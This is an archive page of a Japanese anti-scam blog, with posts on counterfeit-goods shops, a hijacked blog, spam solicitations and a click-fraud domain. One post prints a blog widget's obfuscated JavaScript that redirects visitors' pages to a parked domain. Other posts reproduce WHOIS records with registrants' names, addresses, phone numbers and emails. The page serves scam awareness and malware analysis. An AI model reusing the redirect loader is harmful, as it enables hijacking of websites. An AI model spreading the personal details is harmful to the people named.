![[11]](https://s.yimg.jp/i/jp/blog/p3/images/paging_for2.gif){kind=small}
(要約) 中国の詐欺ショップが、大挙してYahoo!ブログへ進入しているのを見つけました。 今後、見つけ次第にカスタマーサービスへ違反報告しますので、ご承知おき下さい。 http://c.statcounter.com/4440886/0/1c5b0b72/0/ 人閲覧者接続情報 http://www.robtex.com/ipinfo.gif中国の詐欺ショップが、大挙してYahoo!ブログへ進入しているのを見つけました。 発見した中国の詐欺ショップは、全部で8サイトあります。 そのうち4サイトは日本語のページとして作成されていて、 すでに一部はYahoo!ブログへ進入しています。 残りの4サイトは英語版でアメリカ向けの詐欺のようです。 これらのサイトは、すべて同じメールアドレスで登録してあることから判明しました。 最初に日本語で作成され、日本人向けの詐欺と思われる4サイトです。 こちらについては、サイトのドメイン、会社概要ページのイメージと ドメイン登録情報を掲載します。 www.bpluxury.com◆サムネールを見る ドメイン名:BPLUXURY.COM Whois サーバー:whois.hostmonster.com 更新日:2015-05-27T07:59:33Z 作成日:2015-05-27T07:59:33Z 登録満了日:2016-05-27T07:59:33Z レジストラ:FastDomain Inc. [ドメイン登録者] ID: 氏名:WANG PENGFEI 街区名:HOUZHAIBEIZHANYIQU78 都市名:YIWU 郵便番号:322000 国名:CHINA 電話番号:+1.3484069077 メールアドレス:85005730@163.COM www.vvluxury.com◆サムネールを見る ドメイン名:VVLUXURY.COM Whois サーバー:whois.hostmonster.com 更新日:2015-05-28T03:15:04Z 作成日:2015-05-28T03:15:04Z 登録満了日:2016-05-28T03:15:04Z レジストラ:FastDomain Inc. [ドメイン登録者] 氏名:WANG PENGFEI 街区名:HOUZHAIJIEDAOBEIZHANYIQU78 都市名:YIWU 郵便番号:322000 国名:CHINA 電話番号:+1.3484069077 メールアドレス:85005730@163.COM www.glluxury.com◆サムネールを見る ドメイン名:GLLUXURY.COM Whois サーバー:whois.hostmonster.com 更新日:2015-05-27T07:53:27Z 作成日:2015-05-27T07:53:27Z 登録満了日:2016-05-27T07:53:27Z レジストラ:FastDomain Inc. [ドメイン登録者] 氏名:WANG PENGFEI 街区名:HOUZHAIBEIZHANYIQU78 都市名:YIWU 郵便番号:322000 国名:CHINA 電話番号:+1.3484069077 メールアドレス:85005730@163.COM www.jbluxury.com◆サムネールを見る ドメイン名:JBLUXURY.COM Whois サーバー:whois.hostmonster.com 更新日:2015-05-27T07:39:33Z 作成日:2015-05-27T07:39:33Z 登録満了日:2016-05-27T07:39:33Z レジストラ:FastDomain Inc. [ドメイン登録者] 氏名:WANG PENGFEI 街区名:BEIZHANYIQU 78ZHUANG 都市名:YIWU 郵便番号:322000 国名:CHINA 電話番号:+1.3484069077 メールアドレス:85005730@163.COM 残りの4サイトは英語版のページです。 そのままYahoo!ブログで宣伝することはないと思われます。 そのためサイトのドメイン名とページイメージを示すに留めておきます。 今後、見つけ次第にカスタマーサービスへ違反報告します。 Yahoo!さんにおかれましては、上記サイトへのリンクに関する違反報告を受けたら 該当するブログの削除で対応して頂きたく存じます。  Messaage Box 書庫 投稿ネタはコレに決まり! 話題のキーワードをチェック!強行採決, 台風11号, 熱中症, 夏本番, 土用, 国立競技場, 違憲, 戦争法案, image, https, 梅雨明け, 自衛権, 安全保障関連法案, 安保法案, 東海地方, 水分補給, 猛暑日, 東芝, 三連休, 安倍政権
|
ブログ詐欺対策
-
詳細
スパム対策に関するお知らせ 
記事と無関係な多重コメントは無条件削除します 
コメント(0)
コメント(0)
(要約) とある忍者ブログが乗っ取られて、ブロガーさんが困っているとの情報を頂きました。 調べてみると、たしかに今はパーキングされているドメインページへ移動します。 さらに詳しく調べたら、ブログパーツ『猫画像』が原因のようでした。 なお、スクリプトタイプのブログパーツですので、Yahoo!ブログでの被害はないと思います。 http://c.statcounter.com/4440886/0/1c5b0b72/0/ 人閲覧者接続情報 http://www.robtex.com/ipinfo.gifとある忍者ブログが乗っ取られて、ブロガーさんが困っているとの情報を頂きました。 調べてみると、たしかに今はパーキングされているドメインページへ移動します。 さらに詳しく調べると、このようなスクリプトを見付けました。 <div class="PluginContents left"> <script src="http://cat.1on1battle.com/battle/blog_parts_tag"></script> <noscript><a href="http://cat.1on1battle.com/">猫画像</a></noscript> 試しにスクリプトアドレスのソースコードを調べると、やはりJSを利用して自動移動させています。 ヘッダ− HTTP/1.1 200 OK Content-Length: 457 Content-Type: application/x-javascript Content-Location: http://cat.1on1battle.com/battle/blog_parts_tag/index.js Last-Modified: Fri, 31 Oct 2014 16:40:50 GMT ソースコード eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('0="3://4.1-2.5/";8.9.6.7=0;',10,10,'JavaScriptRedirectURL|kyushu|journal|http|www|net|location|href|window|top'.split('|'),0,{}))
JavaScriptRedirectURLの後に続く部分に移動先のアドレスが埋め込まれています。 そのため、今はドメインパーキングされているwww.kyushu-journal.netへ自動移動しているのです。 スクリプトのヘッダ−には、2014年10月31日の日付があります。 一方、2014年12月9日の記事までは正常動作していたようですが、 2015年4月14日の記事では、『ブログが乗っ取られてる…。』と悲鳴を上げていました。 ブログが乗っ取られてる…。http://www.kyushu-journal.net/に! 借りてるとこに問い合わせしたけど、 たらい回しであかん…。( 2015/04/14(火) 22:45:49 ) どの時点で異変が起きたのかはっきりしませんが、少なくともブログパーツによってブログを乗っ取られる事態に陥ったことは間違いありません。 一体、ブログパーツ『猫画像』がどんなブログパーツだったのか、今では知る由もありません。 ブログの機能としてブログパーツを無効化した状態でメンテナンスができるのであれば、ブログパーツを取り外すだけで解決するでしょう。 しかし、メンテナンス画面でブログパーツも機能してしまうようでは回復不可能です。 幸いなことに、このブログパーツはスクリプトタイプでした。 Yahoo!ブログのメニューにはブログパーツを組み込めませんし、記事での利用も困難なためにYahoo!ブログでの被害はないものと思います。 ところで、誰が配布していたブログパーツだったのか気になるところですが、Whoisでは現在のドメインオーナーしか調べることができませんが、現在の所有者は中国になっていました。 Domain Name: 1on1battle.comRegistry Domain ID: 1836718717_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.22.cn Registrar URL: http://www.22.cn Updated Date: 2013-11-25T01:11:49Z Creation Date: 2013-11-25T01:11:49Z Expiration Date: 2015-11-25T01:11:49Z Registrar: Hangzhou Aiming Network Co.,Ltd Registrant Name: wangziteng Registrant Organization: wangsongping Registrant Street: hubeishengxiangfanshixiangchengqutanxilu2haofu96hao Registrant City: xiangfan Registrant State/Province: hubei Registrant Postal Code: 441022 Registrant Country: CN Registrant Phone: +86.710.3576382 Registrant Fax: +86.710.3576382 Registrant Email: 9498585@qq.com それにしてもスクリプトタイプのブログパーツは、長期的に安定して運営されるサイトのもの以外、絶対に信用できないことになりますね。。。 Messaage Box 書庫 投稿ネタはコレに決まり! 話題のキーワードをチェック!梅雨入り, 安倍政権, 田植え, 憲法学者, 参考人, 安田記念, blank, 違憲, 中東呼吸器症候群, 安保法案, 戦争法案, facebook, MERS, 自衛権, 雨予報, https, 紫陽花, 花菖蒲, 鳴尾記念, image
|
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
(要約) どこからやって来るのか定かでなかったので、ほとんど記事にしませんでしたが やっとカモがメールアドレス背負ってやって来ました。 http://c.statcounter.com/4440886/0/1c5b0b72/0/ 人閲覧者接続情報 http://www.robtex.com/ipinfo.gifどこからやって来るのか定かでなかったので、ほとんど記事にしませんでしたが・・・ ニックネームのリンク先を開くとブログ未開設となっています。 しかし、そのページにはブログプロフィールページへのリンクがありますから、ブログプロフィールのサムネールを取得できました。 この勧誘はYahoo!でのIDやソフトバンクのメールアドレスを転々と変えながら かなり長期間に渡って続いています。 そのため判別としては文面の内容に頼るしかないですけど、 ほとんどが身に覚えのない内容ですし、「ありがとうございました!」と書きながら「コメントするのにだいぶ迷った」と書くなど、一貫性が見られないことからも判別できるものと思います。 なお・・・ ブログが未開設でもブログプロフィールだけは存在しています。 携帯版の場合は、ブログプロフィールページがありませんから閲覧はできません。 その代わり、アドレスにはYahoo!ID、またはニックネームのIDが含まれています。 http://blogs.mobile.yahoo.co.jp/p/blog/common/noblog?yid=yuup0q95yt51 パソコン版、スマフォ版は表示名に付いているアドレスも共通ですが、 以前のプロフィールページと同じで暗号化されたIDが使われています。 http://blogs.yahoo.co.jp/FRONT/noblog.html?id=aPdn3kIobrOsAUXwWUBmblE- そのリンクを開けば、ブログプロフィールページへ移動します。 http://blogs.yahoo.co.jp/PROFILE/klo2dKQobrOsFwerZa1d3YeN8Wk- この関係さえ判明すれば、IDと暗号化IDの変換もできそうですが、やたらと手間が掛かりますね。 Messaage Box 書庫 投稿ネタはコレに決まり! 話題のキーワードをチェック!引越し, 三寒四温, 河津桜, https, オープン戦, 北斗星, 紅梅, image, ダイヤ改正, 啓蟄, 年度末, 白梅, 弥生賞, 梅の花, 北陸新幹線, 梅林, トワイライトエクスプレス, ひな祭り, トーセンバジル, 小雨
|
(要約) 去年1年間に、全国の税関が偽ブランド品やコピー商品として 国内への輸入を差し止めた件数は、これまでで最も多くなりました。 増えた理由の一つはインターネットの通信販売が拡大していることです。 残念な事に、Yahoo!ブログでも偽ブランド品、コピー商品の宣伝が行われています。 春節で休んでいたサイトの勧誘ブログが今日から復活しています。 http://c.statcounter.com/4440886/0/1c5b0b72/0/ 人閲覧者接続情報 http://www.robtex.com/ipinfo.gif去年1年間に、全国の税関が偽ブランド品やコピー商品として 国内への輸入を差し止めた件数は、これまでで最も多くなりました。 増えた理由の一つはインターネットの通信販売が拡大していることです。 偽ブランド品輸入差し止め ネット通販拡大で最多
去年1年間に、全国の税関が偽ブランド品やコピー商品として国内への輸入を差し止めた件数は、インターネットの通信販売が拡大していることからこれまでで最も多くなりました。
( 2015/03/04(水) 14:23:49 )財務省によりますと、去年1年間に、全国の税関が偽ブランド品やコピー商品として輸入を差し止めた件数は、前の年と比べて14%増えて3万2060件に上り、昭和62年に統計を取り始めて以来、最も多くなりました。 押収した商品がすべて正規品だった場合、180億円相当になるということです。これは、インターネットの通信販売が拡大しているためで、ハンドバッグや財布、ブランドのロゴなどが入ったスマートフォンのケースなどが多く差し止められました。 また、去年は、ブラジルでサッカーワールドカップが開かれたこともあり、日本代表のユニフォームのコピー商品なども摘発されました。こうした偽ブランド品やコピー商品は、中国から持ち込まれるケースが依然として全体の9割以上を占めるとういうことで、財務省では中国の税関当局と連携しながら取締りを強化したいとしています。 残念な事に、Yahoo!ブログでも偽ブランド品、コピー商品の宣伝が行われています。 春節で休んでいたサイトの勧誘ブログが今日から復活しています。 インターネットでは実物を見ることができないため、 偽ブランドやコピー商品を見抜くのは困難ですが、次の方法で確認してください。
偽ブランド品やコピー商品を国内への輸入すると税関で差し止めとなりますし、 量が多ければ事情聴取されることもあります。 くれぐれも、海外サイトの偽ブランド品やコピー商品には注意してくださいね。 Messaage Box 書庫 投稿ネタはコレに決まり! 話題のキーワードをチェック!男性主人公, スクルト, Winchester, 攻撃タイプ, 雛祭り, PS4, 女性主人公, キャラクターボイス, すべて敵, 遠距離攻撃, 闇竜, ドラゴンクエストモンスターズ, 運用担当, 使用武器, サドンアタック, USP, 有名プレイヤー, おてんば姫, DQシリーズ, 主人公2人
|
(要約) クリック詐欺サイトのドメイン cyclamen1209.info は、 日本時間で14日午前5時ごろ、レジストラ Wild West Domains の管理下に置かれました。 このままでは再開できませんので、逮捕されていなければ新しいドメインに移動するはずです。 http://c.statcounter.com/4440886/0/1c5b0b72/0/ 人クリック詐欺サイトのドメイン cyclamen1209.info は、 日本時間で14日午前5時ごろ、レジストラ Wild West Domains の管理下に置かれました。 ドメイン登録情報 cyclamen1209.infoDomain Name:CYCLAMEN1209.INFO Domain ID: D54187315-LRMS Creation Date: 2014-12-09T06:59:47Z Updated Date: 2014-12-13T20:27:01Z Registry Expiry Date: 2015-12-09T06:59:47Z Sponsoring Registrar:Wild West Domains, LLC (R213-LRMS) Sponsoring Registrar IANA ID: 440 WHOIS Server: whois.wildwestdomains.com Referral URL: http://www.wildwestdomains.com Domain Status: clientDeleteProhibited Domain Status: clientRenewProhibited Domain Status: clientTransferProhibited Domain Status: clientUpdateProhibited Domain Status: serverTransferProhibited Registrant ID:CR182850818 Registrant Name:Repossessed by Wild West Domains Registrant Organization:Repossessed by Wild West Domains Registrant Street: 14455 N Hayden Rd Registrant Street: Suite 219 Registrant City:Scottsdale Registrant State/Province:AZ Registrant Postal Code:85260 Registrant Country:US Registrant Phone:+1.4805058800 Registrant Phone Ext: Registrant Fax: +1.4805058844 Registrant Fax Ext: Registrant Email:repossesseddomain@wildwestdomains.com Admin ID:CR182850820 Admin Name:Repossessed by Wild West Domains Admin Organization:Repossessed by Wild West Domains Admin Street: 14455 N Hayden Rd Admin Street: Suite 219 Admin City:Scottsdale Admin State/Province:AZ Admin Postal Code:85260 Admin Country:US Admin Phone:+1.4805058800 Admin Phone Ext: Admin Fax: +1.4805058844 Admin Fax Ext: Admin Email:repossesseddomain@wildwestdomains.com Billing ID:CR182850821 Billing Name:Repossessed by Wild West omains Billing Organization:Repossessed by Wild West Domains Billing Street: 14455 N Hayden Rd Billing Street: Suite 219 Billing City:Scottsdale Billing State/Province:AZ Billing Postal Code:85260 Billing Country:US Billing Phone:+1.4805058800 Billing Phone Ext: Billing Fax: +1.4805058844 Billing Fax Ext: Billing Email:repossesseddomain@wildwestdomains.com Tech ID:CR182850819 Tech Name:Repossessed by Wild West Domains Tech Organization:Repossessed by Wild West Domains Tech Street: 14455 N Hayden Rd Tech Street: Suite 219 Tech City:Scottsdale Tech State/Province:AZ Tech Postal Code:85260 Tech Country:US Tech Phone:+1.4805058800 Tech Phone Ext: Tech Fax: +1.4805058844 Tech Fax Ext: Tech Email:repossesseddomain@wildwestdomains.com Name Server:NS09.DOMAINCONTROL.COM Name Server:NS10.DOMAINCONTROL.COM DNSSEC:Unsigned そのため14日(日)以降はYahoo!トラベルにも現れることができなかったようです。 このままでは再開できませんので、逮捕されていなければ新しいドメインに移動するはずです。 Messaage Box 書庫 投稿ネタはコレに決まり! 話題のキーワードをチェック!小選挙区, 阪神ジュベナイルフィリーズ, 衆院選, 衆議院選挙, 自公, 投票所, 選挙速報, 羽生選手, 議席, 開票, 赤穂浪士, 候補者, 有権者, 出口調査, 討ち入り, ふたご座流星群, コートシャルマン, 期日前投票, 妖怪ウォッチ, 寒波
閲覧者接続情報 http://www.robtex.com/ipinfo.gif |
